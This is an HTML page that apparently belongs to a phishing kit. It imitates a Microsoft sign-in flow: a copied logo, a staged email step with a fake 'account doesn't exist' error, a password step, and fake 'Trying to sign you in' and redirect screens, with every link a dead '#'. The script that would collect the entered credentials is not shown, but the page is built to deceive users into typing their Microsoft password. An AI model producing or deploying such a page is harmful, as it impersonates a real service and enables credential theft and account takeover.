<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Sign in to your account</title>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
<script src="https://code.jquery.com/jquery-3.6.1.min.js"></script>
<link rel="shortcut icon" type="image/x-icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeklEQVR4nO3UMQqAMBBE0QUL7+F5LOxyxlSewTvZj/10Q8AI/gfbBpb8pAoAPklt08j4eft5aGSKBRo3IBJK8IgNv1CKhAwJpUjIkFCKhGYnBPzd0m+NjJ+na9XIFAt0bkAklOARG36hFAkZEkqRkCGhFAnNTggA6g0PsZwml5fu+o4AAAAASUVORK5CYII=">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
<style type="text/css">
    textarea:hover, input:hover, textarea:active, input:active, textarea:focus, input:focus, button:focus, button:active, button:hover, label:focus, .btn:active, .btn.active {
        outline: 0px !important;
        -webkit-appearance: none;
        box-shadow: none !important;
    }
    .box {
        box-shadow: 0 2px 6px rgb(0 0 0 / 20%);
        max-width: 440px;
        padding: 48px !important;
        margin-left: auto;
        margin-right: auto;
        margin-top: 20px;
        margin-bottom: 28px;
        background-color: white;
        overflow-x: hidden;
    }
    .boxtext {
        z-index: 0px;
        transform: translateX(+200px);
        animation: myAnim 300ms ease-in 0s 1 normal forwards;
    }
    @keyframes myAnim {
        0% {
            transform: translateX(-200);
        }
        100% {
            transform: translateX(0px);
        }
    }
    @keyframes bgmyAnim {
        0% {
            opacity: 0;
        }
        100% {
            opacity: 1;
        }
    }
    .box2 {
        box-shadow: 0 2px 6px rgb(0 0 0 / 20%);
        max-width: 440px;
        padding: 8px 48px !important;
        margin-left: auto;
        margin-right: auto;
        margin-bottom: 28px;
        background-color: white;
    }
    #footer {
        position: fixed;
        bottom: 0px;
        width: 100%;
        overflow: visible;
        z-index: 99;
        clear: both;
    }
    div .footerNode a,
    div .footerNode span {
        color: #000;
        font-size: 0.75rem;
        line-height: 28px;
        white-space: nowrap;
        display: inline-block;
        float: right;
        margin-left: 8px;
        margin-right: 8px;
    }
    .bgimg {
        animation: bgmyAnim 1s cubic-bezier(0.11, 0, 0.5, 0) 0s 1 normal forwards;
        position: absolute;
        height: 100%;
        width: 100%;
        top: 0px;
        background-size: cover;
        background-repeat: no-repeat;
        background-image: url('https://i.imgur.com/SyO5Weq.jpg');
    }
    .topp {
        margin-top: 48px !important;
        padding-top: 48px !important;
    }
    @media only screen and (max-width: 610px) {
        #hide {
            display: none;
        }
        .topp {
            margin-top: 10px !important;
            padding-top: 5px !important;
        }
        .bgimg {
            position: absolute;
            height: 100%;
            width: 100%;
            top: 0px;
            background-size: cover;
            background-repeat: no-repeat;
            background-image: none;
            background-color: white;
        }
        .box {
            box-shadow: none;
            max-width: 440px;
            padding: 0px !important;
            margin-left: auto;
            margin-right: auto;
            margin-top: 0px;
            margin-bottom: 28px;
            background-color: white;
        }
        .box2 {
            box-shadow: none;
            border: 1px solid;
            max-width: 440px;
            padding: 8px 20px !important;
            margin-left: 30px !important;
            margin-right: 30px !important;
            margin-bottom: 28px !important;
            background-color: white;
        }
    }
    .loader {
        width: 40px;
    }
    .loader .circle {
        position: absolute;
        width: 18px;
        height: 18px;
        opacity: 0;
        transform: rotate(225deg);
        animation-iteration-count: infinite;
        animation-name: orbit;
        animation-duration: 3s;
    }
    .loader .circle:after {
        content: "";
        position: absolute;
        width: 3px;
        height: 3px;
        border-radius: 5px;
        background: #000;
    }
    .loader .circle:nth-child(2) {
        animation-delay: 240ms;
    }
    .loader .circle:nth-child(3) {
        animation-delay: 480ms;
    }
    .loader .circle:nth-child(4) {
        animation-delay: 720ms;
    }
    .loader .circle:nth-child(5) {
        animation-delay: 960ms;
    }
    @keyframes orbit {
        0% {
            transform: translate(10px, 0);
            opacity: 1;
            animation-timing-function: ease-out;
        }
        7% {
            transform: translate(30px, 
0);
            animation-timing-function: linear;
        }
        30% {
            transform: translate(60px, 0);
            animation-timing-function: ease-in-out;
        }
        40% {
            transform: translate(90px, 0);
            animation-timing-function: ease-out;
        }
        50% {
            transform: translate(120px, 0);
            animation-timing-function: ease-out;
        }
        75% {
            transform: translate(250px, 0);
            animation-timing-function: ease-out;
        }
        76% {
            transform: translate(300px, 0);
            opacity: 0;
        }
        100% {
            transform: translate(350px, 0);
            opacity: 0;
        }
    }
</style>
</head>
<body>
<div class="bgimg"></div>
<div class="container-fluid">
<div class="container">
<div class="row topp">
<div class="col-lg-12 text-center mx-auto"></div>
<div class="col-lg-6 mx-auto">
<div class="box" id="diiiv1">
<div class="loader" style="display:none;">
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
</div>
<div class="boxtext">
<img src="https://i.imgur.com/S4iamjZ.png" style="max-height: 36px;" id="banner1" class="img-fluid logoimg"><br><br>
<span class="h5">Sign In</span><br>
<span id="error" class="text-danger" style="display: none;">That Microsoft account doesn't exist. Enter a different account</span>
<div class="form-group mt-2">
<input type="email" name="ai" class="form-control rounded-0 border-dark" id="ai" aria-describedby="aiHelp" placeholder="Email, phone, or Skype" value="" style="border-right: none;border-left: none;border-top: none;">
</div>
<p style="font-size: 13px">No account? <a href="#">Create one!</a></p>
<p style="font-size: 13px"><a href="#">Can't access your account?</a></p>
<div class="text-right">
<button type="button" class="btn rounded-0 text-white px-4" style="color: #4CAF50;background-color: #b2b2b2;cursor: pointer;">Back</button>
<button type="button" class="btn rounded-0 text-white px-4" id="next" style="background-color: #0066BA;cursor: pointer;">Next</button>
</div>
</div>
</div>
<div class="box" id="div2" style="display: none;">
<div class="loader" style="display:none;">
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
</div>
<form id="contact" class="boxtext">
<img src="https://i.imgur.com/S4iamjZ.png" style="max-height: 36px;" id="banner2" class="img-fluid logoimg"><br><br>
<i class="fas fa-arrow-left" id="back"></i>&nbsp&nbsp<span id="aich">email@office.com</span>
<div class="py-2"><span class="h5">Enter Password</span></div>
<span class="pb-2" style="color: #e81123;" id="msg"></span>
<div class="form-group mt-2">
<input type="password" name="pr" class="form-control rounded-0 border-dark" id="pr" aria-describedby="aiHelp" placeholder="Enter Password" style="border-right: none;border-left: none;border-top: none;">
</div>
<p style="font-size: 14px"><a href="#">Forget password?</a></p>
<div class="text-right">
<button type="button" class="btn rounded-0 text-white px-4" id="submit-btn" style="background-color: #0066BA;">Sign in</button>
</div>
</form>
</div>
<div class="box" id="div3" style="display: none;">
<div class="boxtext">
<img src="https://i.imgur.com/S4iamjZ.png" style="max-height: 36px;" id="banner3" class="img-fluid logoimg"><br><br>
<span class="h4">Taking you to your Organization's sign-in page</span><br><br>
<div class="loader">
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
</div><br>
<div class="text-left">
<a href="#">cancel</a>
</div><br><br>
</div>
</div>
<div class="box" id="div9" style="display: none;">
<div class="boxtext">
<img src="https://i.imgur.com/S4iamjZ.png" style="max-height: 36px;" id="banner4" class="img-fluid logoimg"><br><br>
<span class="h4">Trying to sign you in</span><br><br>
<div class="loader">
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
<div class="circle"></div>
</div><br>
<div class="text-left">
<a href="#">cancel</a>
</div><br><br>
</div>
</div>
</div>
</div>
<div class="row" id="row">
<div class="col-sm-5 mx-auto box2">
<div class="py-2 bg-white ">
<span><i class="fas fa-key"></i> &nbspSign-in options</span>
</div>
</div>
</div>
</div>
<footer id="footer">
<div>
<div class="footerNode">
<a href="#">Privacy & cookies</a>
<a href="#">Terms of use</a>
</div>
</div>
</footer>
</body>
</html>
